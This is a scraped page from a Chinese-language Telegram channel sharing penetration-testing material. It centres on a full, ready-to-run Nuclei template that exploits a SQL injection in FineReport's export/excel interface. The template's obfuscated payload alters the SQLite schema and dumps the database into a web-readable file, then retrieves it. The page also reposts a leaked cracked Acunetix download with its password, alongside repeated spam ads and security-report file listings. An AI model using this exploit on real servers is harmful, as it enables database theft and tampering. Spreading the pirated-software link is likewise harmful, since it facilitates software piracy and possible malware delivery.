ch
Feedback
信息安全渗透攻防漏洞分享

信息安全渗透攻防漏洞分享

前往频道在 Telegram

信息安全渗透测试计算机网络安全攻防技术漏洞分析研究黑客资料分享

显示更多
952
订阅者
-124 小时
-17
+1530
帖子存档
#渗透测试 #技术分享 #安全分享

id: FineReport-exportexcel-sqli
info:
  name: FineReport-exportexcel-sqli
  author: sibei
  severity: high
  tags: FineReport
http:
  - raw:
      - |
        GET /webroot/ReportServer HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
        viewlets: [{'reportlet':'/'}]
        op: getSessionID
    extractors:
      - type: regex
        part: body
        name: id_upload
        internal: true
        regex:
          - "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
  - raw:
      - |+
        GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7b%7d&__parameters__=%7b%7d HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0
        sessionID: {{id_upload}}
        params: %3Cpd%3E%0A+%3CLargeDatasetExcelExportJS+dsName%3D%221%22%3E%0A%3CParameters%3E%3CParameter%3E%0A%3CAttributes+name%3D%22c%22%2F%3E%3CO+t%3D%22Formula%22%3E%3CAttributes%3E%3C%21%5BCDATA%5Bsql%28%27FRDemo%27%2CCONCATENATE%28%22pr%22%2C%22agm%22%2C%22a+wr%22%2C%22i%22%2C%22t%22%2C%22a%22%2C%22ble%22%2C%22_sch%22%2C%22e%22%2C%22ma%3Do%22%2C%22n%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22dele%22%2C%22t%22%2C%22e+f%22%2C%22r%22%2C%22o%22%2C%22m+sq%22%2C%22li%22%2C%22t%22%2C%22e_sc%22%2C%22he%22%2C%22ma+w%22%2C%22here%22%2C%22+na%22%2C%22m%22%2C%22e%21%22%2C%22%3D%22%2C%22%27s%22%2C%22ql%22%2C%22ite%22%2C%22_s%22%2C%22ta%22%2C%22t%22%2C%221%27%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22an%22%2C%22aly%22%2C%22ze%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22re%22%2C%22p%22%2C%22lac%22%2C%22e+i%22%2C%22nto%22%2C%22+s%22%2C%22ql%22%2C%22ite_%22%2C%22st%22%2C%22at%22%2C%221+va%22%2C%22lu%22%2C%22es%28%27%22%2C%22%27%2C%27123%22%2C%22%27%22%2C%22%29%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22V%22%2C%22A%22%2C%22C%22%2C%22U%22%2C%22U%22%2C%22M%22%2C%22+i%22%2C%22nt%22%2C%22o%28%27%22%2CENV_HOME%2C%22%2F%22%2C%22.%22%2C%22.%22%2C%22%2F%22%2C%22.%22%2C%22%2F%22%2C%22{{randstr}}%22%2C%22.%22%2C%22t%22%2C%22x%22%2C%22t%22%2C%22%27%29%22%29%2C1%29%5D%5D%3E%3C%2FAttributes%3E%3C%2FO%3E%3C%2FParameter%3E%3C%2FParameters%3E%3C%2FLargeDatasetExcelExportJS%3E%3C%2Fpd%3E

  - raw:
      - |
        GET /webroot/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SQLite format"
      - type: status
        status:
          - 200
帆软报表FineReport export/excel接口存在SQL注入漏洞

lyra超级提示词.md0.03 KB

Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐 👉 t.me/jisou?start=a_1200135666
Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐 👉 t.me/jisou?start=a_1200135666

Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐 👉 t.me/jisou?start=a_1200135666
Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐 👉 t.me/jisou?start=a_1200135666

OWASP-Top-10-for-Agentic-Applications-2026-12.6-1.pdf1.22 MB

深度研究安全圈人物 Yuange.pdf3.02 KB

Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐 👉 t.me/jisou?start=a_1200135666
Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐 👉 t.me/jisou?start=a_1200135666

Repost from Pwn3rzs
Acunetix v25.11.251107123 - 14 Nov 2025 Windows: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v25.11.251107123-Windows-Pwn3rzs-CyberArsenal.rar Linux: [No installer leaked, yet] Password: Pwn3rzs Changelog: Too long for a post, refer here: https://www.acunetix.com/changelogs/acunetix-premium/v25-11-12-november-2025/

关于2022年3月APT_C_41伪装为WinRar_exe攻击的终端侧应急响应排查点.pdf1.15 MB

#网络安全 #技术分享 #渗透测试 #钓鱼 #黑客技术 #渗透测试 #攻防

#网络安全 #技术分享 #AI #互联网

快手重大安全事件,期待后续公开细节。

Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐 👉 t.me/jisou?start=a_1200135666
Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐 👉 t.me/jisou?start=a_1200135666

#技术分享 #渗透测试 Active Directory 渗透测试思维导图 2025

#网络安全 #技术分享 #知识分享 #CVE2025 #LLM TP-Link Tapo C200:硬编码密钥、缓冲区溢出以及 AI 辅助逆向工程时代的隐私问题: https://www.evilsocket.net/2025/12/18/TP-Link-Tapo-C200-Hardcoded-Keys-Buffer-Overflows-and-Privacy-in-the-Era-of-AI-Assisted-Reverse-Engineering 漏洞类型:硬编码密钥 (Hardcoded Keys):设备固件中直接嵌入了加密密钥或认证凭据,攻击者一旦提取固件即可轻松获取,从而破解加密通信。 AI 辅助逆向工程:作者强调了 LLM(大语言模型) 如何改变了安全研究。利用 AI 辅助分析反汇编代码、识别复杂的漏洞模式(如缓冲区溢出)以及编写利用脚本,使得过去需要数周的工作现在可能在数小时内完成。 涉及CVE:CVE-2025-8065、CVE-2025-14299、CVE-2025-14300 参考: links:https://github.com/kayranfatih/awesome-iot-and-hardware-security

编码密码总结.pdf9.97 MB

报告_《安永2025全球可信AI治理与数据安全报告》.pdf6.47 MB

加密与网络安全:班加罗尔大学.pdf3.13 MB

TC260_003_《生成式人工智能服务安全基本要求》.pdf3.20 KB

蚂蚁技术AntTech_2024生成式大模型安全评估白皮书.pdf359.59 MB